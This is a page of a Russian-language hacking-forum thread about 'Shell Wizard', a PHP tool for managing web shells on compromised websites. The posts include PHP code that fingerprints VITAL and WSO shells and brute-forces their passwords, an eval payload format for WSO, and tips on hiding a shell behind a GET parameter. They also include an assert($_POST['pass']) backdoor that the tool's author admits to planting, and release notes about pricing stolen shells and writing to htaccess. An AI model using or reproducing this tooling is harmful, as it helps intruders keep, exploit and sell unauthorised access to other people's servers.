RDot: White Hat Security Community
Страница 2 из 4 1 2 34
Показывать 40 сообщений этой темы на одной странице

RDot: White Hat Security Community (https://rdot.org/forum/index.php)
-   Релизы/Releases (https://rdot.org/forum/forumdisplay.php?f=11)
-   -   [S]Hell Wizard - управляем веб-шеллами вместе c Dr.Z3r0 :) (https://rdot.org/forum/showthread.php?t=136)

Boddhisatva 23.11.2010 15:20
Как вариант - брать незапароленный WSO, и немного модифицировать его, чтобы работал только, например, при if($_GET['wso']=='launch'), или как там. И эту строку в настройках прописать.
Хоть какая-то безопасность от посторонних глаз.

Acez666 16.12.2010 00:34
досю себя в netstat ничего нету и в логах апатча. не досит чтоли?

Acez666 16.12.2010 01:07
а не поперло, надо 600 потоков ставить.

dasknix 26.12.2010 19:50
про защищенные (не обязательно пассами, можно создать свой способ):

увидел тут на днях шелвизард и дофига чего не устроило, хз, может я претенционзен,
либо сабжевый sh wiz ещё слишком молод. в любом случае спасибо автору, т.к. несмотря
на то что идея создать shm для автоматизации и управления была давно.. ну вы сами
знаете - идей дофига а на практике по проекту в полгода дай бог рожаем

написал свой, собссно пару фрагов кода, весь выложить не могу, за EP считаем shdet()
PHP код:
// sh pattz
    $shpats = array(
         T_VITAL =>    array(
             def => array('<title>VITAL</title>')
            ,auth => array(
                 'input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}'
                ,'<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">'
             )
            ,auth_answ => array(
                 '<meta http-equiv="refresh" content="1;URL='
                ,'<a style="font:12px Verdana" href="'
                ,'">Success</a>'
             )
         )
        ,T_WSO => array(
             def => array("BOFF 1.0")
            ,auth => array(
                 "<pre align=center><b>Authorization</b><br>"
                ,"0ff \/\/"
                ,"<br><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"
            )
         )
        #,T_CMAD => ""
        #,T_R57 => ""
    ); 
PHP код:
function shdet(array $sh){
    global $shpats;
    global $pwdz;
    global $shz;

    $buf nw_get(M_GET$sh[url]);

    foreach($shpats as $shpat_type => $shpat){
        if(inarr($shpat[def],$buf)){
            mod($sh,    AUTH_NO,        auth,need);
            mod($sh,    $shpat_type,    type);
            mod($sh,    ONLINE,            status);
            /*
                $shz[$sh[id]][auth][need]    = AUTH_NO;
                $shz[$sh[id]][type]            = $shpat_type;
                $shz[$sh[id]][status]        = ONLINE;
                $shz[$sh[id]][update]        = ONLINE;
            */
            return true;
        }
    }

    foreach($shpats as $shpat_type => $shpat){
        foreach($shpat[auth] as $auth_pat){
            if(strpos($buf$auth_pat) !== false){
                global $cookie;

                $shz[$sh[id]][type] = $shpat_type;
                $sh[type] = $shpat_type;
                $shz[$sh[id]][auth][need] = AUTH_USE;

                // auth to sh with current shpat type
                    foreach($pwdz as $pw){
                        $auth_answ make_auth($sh$pw);
                        if($shpats[$shpat_type][auth_answ][0])
                            $auth inarr($shpats[$shpat_type][auth_answ], $auth_answ) ? OK false;
                        else
                            $auth inarr($shpats[$shpat_type][def], $auth_answ) ? OK false;

                        if($auth){
                            $shz[$sh[id]][auth][state] = OK;
                            $shz[$sh[id]][auth][pw] = $pw;
                            $shz[$sh[id]][auth][cook] = $cookie $cookie null;
                            return true;
                        }
                        global $auth_delay;
                        sleep($auth_delay);
                    }
                //

                if(!$auth$shz[$sh[id]][auth][state] = FAIL;
                return true;
            }
        }
    }

    return false;

PHP код:
function make_auth(array $sh$pw){
    global $shz;

    cook($sh);

    switch($shz[$sh[id]][type]){        // don' use local old $sh!
        case T_VITAL:
            $nwreq_method    M_POST;
            $nwreq_fpath    $sh[url];
            $nwreq_postargs    = array(
                                        'doing'        => 'login'
                                    ,    'password'    => $pw
                                    );
            # $cookie        = array('phpspypass'    => $pw);

            return nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case T_WSO:
            $nwreq_method    M_POST;
            $nwreq_fpath    $sh[url];
            $nwreq_postargs    = array('pass'    => $pw);
            
            return nw_get($nwreq_method$nwreq_fpath$nwreq_postargs);
        break;
        case T_CMAD:
        break;
        case T_R57:
        break;
        default:
            return false;
    }

само собой делаем регексы, паттерны что
выше по strpos() сделаны на скорую руку

spiderbuber 25.03.2011 05:33
Также при чеке ошибка:
Цитата:
(12:09:42) [2] preg_match() [<a href='function.preg-match'>function.preg-match</a>]: Compilation failed: missing ) at offset 22 X:\home\shwizard\www\includes\func.shell.php (line 61)
Пробовал на разных шеллах. Как поправить регулярку?

Хотелось бы увидеть в новой версии возможность чека не только ПР, но и ТИЦ + Стату ЛИ.РУ а также добавить несколько полей для произвольных меток и комметариев.

Cuko 09.12.2011 08:32
не работает скрипт=\ делаю на локал хосте, в xampp, не добавляет более одного шелла за раз, а по одному не айс как то.

curlbaby 11.12.2011 18:41
для WSO с паролем достаточно передать его по POST, как пример:

Цитата:
Сообщение от Nightmare (Сообщение 2116)
5) eval POST: a=Php&p1=[evalcode]

5) eval POST: pass=password&a=Php&p1=[evalcode]

(dm) 24.12.2011 18:04
Мне понравилась 33 строчка index.php:
Цитата:
if(!empty($_POST['pass']) && !assert($_POST['pass']))die();

M_script 25.12.2011 16:57
Цитата:
Сообщение от (dm)
Мне понравилась 33 строчка index.php
Так вот что означают слова "вместе c Dr.Z3r0" в названии темы.

Dr.Z3r0 28.12.2011 19:11
Цитата:
Сообщение от (dm) (Сообщение 22679)
Мне понравилась 33 строчка index.php:
упс, дико извиняюсь) осталось от старых версий))
тулза разрабатывалась на заказ, с заказчиком работал впервые поэтому был оставлен бекдор на случай если заказчик кинет.
я уже забыл про него :fpalm:

еще раз извиняюсь, я не спецом, серьезно)

UPD:
И дабы загладить свою вину, выкладываю новую версию 5.0. Изменения:
Цитата:
С прошлой версии (4.3) много разных фишек не помню все, но вот то что вспомнил:
- Для каждого шелла создан свой файл-модуль (теперь с минимальными знаниями PHP можно добавить свой шелл)
- Добавленна поддержка проксей
- Проверка ТИЦ
- Проверка Alexa
- Расчет приблизительной цены шелла
- Разбиение шеллов на группы при добавлении их в БД
- Чек PR работает снова
- Добавление кода в htaccess если есть права
- И дадада! WSO поддерживатеся из коробки!
PS: в ней бекдоров нету... вроде...))


Часовой пояс GMT +3, время: 05:42.
Страница 2 из 4 1 2 34
Показывать 40 сообщений этой темы на одной странице

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot